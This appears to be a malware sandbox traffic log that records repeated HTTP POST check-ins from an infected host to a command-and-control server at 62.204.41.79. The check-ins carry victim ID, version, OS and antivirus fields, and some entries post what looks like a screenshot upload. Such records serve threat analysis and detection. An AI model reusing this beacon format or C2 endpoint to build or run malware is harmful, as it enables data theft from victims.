Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTc2Host: 62.204.41.79Content-Length: 106128Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTc2Host: 62.204.41.79Content-Length: 106128Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
